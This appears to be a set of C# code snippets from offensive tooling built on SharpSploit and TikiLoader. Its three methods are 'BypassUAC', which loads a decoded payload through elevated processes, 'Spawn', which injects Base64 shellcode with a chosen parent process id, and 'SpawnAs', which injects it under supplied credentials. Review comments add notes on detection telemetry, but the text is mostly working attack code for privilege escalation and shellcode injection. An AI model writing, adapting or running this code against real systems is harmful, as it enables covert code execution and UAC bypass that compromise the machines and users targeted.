Exemple #1
    /// <summary>
    /// Iterates over the processes yielded by <c>GetUserProcessTokens(true)</c> and, for each one,
    /// calls <c>TikiLoader.Loader.LoadElevated</c> with <paramref name="binary"/>, the decoded
    /// <c>nutclr</c> payload and that process's id, stopping at the first iteration that does not throw.
    /// </summary>
    /// <param name="binary">Forwarded unchanged to <c>LoadElevated</c>.</param>
    /// <param name="path">Not read anywhere in this method.</param>
    /// <param name="arguments">Not read anywhere in this method.</param>
    /// <returns>
    /// The value of <c>Tokens.RevertToSelf()</c> after the first load call that completes;
    /// <c>false</c> when the candidate list is empty or every iteration ended in an exception.
    /// </returns>
    /// <remarks>
    /// The payload comes from the <c>nutclr</c> member declared outside this method, not from a parameter.
    /// Base64 decoding and <c>DecompressDLL</c> run outside the try block, so a malformed payload
    /// propagates to the caller instead of being swallowed.
    /// Per-candidate failures are discarded without logging; the only console output is the candidate count.
    /// NOTE(review): the "Elevated processes" message suggests the <c>true</c> argument filters for
    /// elevated processes, and the process id handed to <c>LoadElevated</c> presumably selects the
    /// process the new one is created from - confirm against GetUserProcessTokens and TikiLoader.
    /// If so, process-creation telemetry with an unexpected elevated parent is the observable to review.
    /// </remarks>
    public static bool BypassUAC(string binary, string path, string arguments)
    {
        SharpSploit.Credentials.Tokens tokenHelper = new SharpSploit.Credentials.Tokens();
        List<Process> candidates = GetUserProcessTokens(true)
            .Select(entry => entry.Process)
            .ToList();

        int candidateCount = candidates.Count;
        Console.WriteLine("Elevated processes: " + candidateCount);

        foreach (Process candidate in candidates)
        {
            // Decoded afresh on every iteration, outside the try block, exactly as the original does.
            byte[] encoded = Convert.FromBase64String(nutclr);
            byte[] image = DecompressDLL(encoded);

            try
            {
                TikiLoader.Loader loader = new TikiLoader.Loader();
                loader.LoadElevated(binary, image, candidate.Id);

                // First iteration that did not throw ends the search; the revert result is the return value.
                bool reverted = tokenHelper.RevertToSelf();
                return reverted;
            }
            catch (Exception)
            {
                // Any failure (loader or revert) is dropped; revert again and fall through to the next candidate.
                tokenHelper.RevertToSelf();
            }
        }

        return false;
    }
    /// <summary>
    /// Base64-decodes <paramref name="shellcode"/>, passes it through <c>DecompressDLL</c>, and hands
    /// the result to <c>TikiLoader.Loader.Load</c> together with <paramref name="binary"/> and
    /// <paramref name="ppid"/>.
    /// </summary>
    /// <param name="binary">Forwarded unchanged to <c>Load</c>.</param>
    /// <param name="shellcode">Base64 text; decoded and decompressed before use.</param>
    /// <param name="ppid">Forwarded unchanged to <c>Load</c>.</param>
    /// <returns><c>true</c> when the loader call completes without throwing; otherwise <c>false</c>.</returns>
    /// <remarks>
    /// Decoding and decompression happen before the try block, so invalid Base64 or a bad archive
    /// throws to the caller rather than returning <c>false</c>.
    /// Loader failures are reduced to <c>Exception.Message</c> on the console; the stack trace is lost.
    /// NOTE(review): <paramref name="ppid"/> is presumably a parent process id chosen by the caller -
    /// confirm in TikiLoader. If so, parent/child lineage alone is not a trustworthy signal when
    /// reviewing process-creation events produced by this code path.
    /// </remarks>
    public static bool Spawn(string binary, string shellcode, int ppid)
    {
        byte[] compressed = Convert.FromBase64String(shellcode);
        byte[] image = DecompressDLL(compressed);

        bool started;
        try
        {
            TikiLoader.Loader loader = new TikiLoader.Loader();
            loader.Load(binary, image, ppid);
            started = true;
        }
        catch (Exception failure)
        {
            // Only the message is reported; the caller learns about the failure through the false result.
            Console.WriteLine(failure.Message);
            started = false;
        }

        return started;
    }
Exemple #3
    /// <summary>
    /// Base64-decodes <paramref name="shellcode"/>, passes it through <c>DecompressDLL</c>, and hands
    /// the result to <c>TikiLoader.Loader.LoadAs</c> together with <paramref name="binary"/> and the
    /// supplied account details.
    /// </summary>
    /// <param name="binary">Forwarded unchanged to <c>LoadAs</c>.</param>
    /// <param name="shellcode">Base64 text; decoded and decompressed before use.</param>
    /// <param name="domain">Account domain; a null or empty value is replaced with <c>"."</c>.</param>
    /// <param name="username">Forwarded unchanged to <c>LoadAs</c>.</param>
    /// <param name="password">Forwarded unchanged to <c>LoadAs</c> as a plain string.</param>
    /// <returns><c>true</c> when the loader call completes without throwing; otherwise <c>false</c>.</returns>
    /// <remarks>
    /// Decoding and decompression happen before the try block, so invalid Base64 or a bad archive
    /// throws to the caller rather than returning <c>false</c>.
    /// The password travels as an ordinary managed <c>string</c>, so it cannot be zeroed after use
    /// and remains in process memory until collected.
    /// Loader failures are reduced to <c>Exception.Message</c> on the console.
    /// NOTE(review): <c>"."</c> presumably denotes the local machine's account database, as in the
    /// Windows logon APIs - confirm against TikiLoader. If so, explicit-credential logon events are
    /// the audit trail to correlate with this call.
    /// </remarks>
    public static bool SpawnAs(string binary, string shellcode, string domain, string username, string password)
    {
        byte[] compressed = Convert.FromBase64String(shellcode);
        byte[] image = DecompressDLL(compressed);

        bool started;
        try
        {
            TikiLoader.Loader loader = new TikiLoader.Loader();

            // A missing domain falls back to "." before the credentials reach the loader.
            string logonDomain = string.IsNullOrEmpty(domain) ? "." : domain;

            loader.LoadAs(binary, image, logonDomain, username, password);
            started = true;
        }
        catch (Exception failure)
        {
            // Only the message is reported; the caller learns about the failure through the false result.
            Console.WriteLine(failure.Message);
            started = false;
        }

        return started;
    }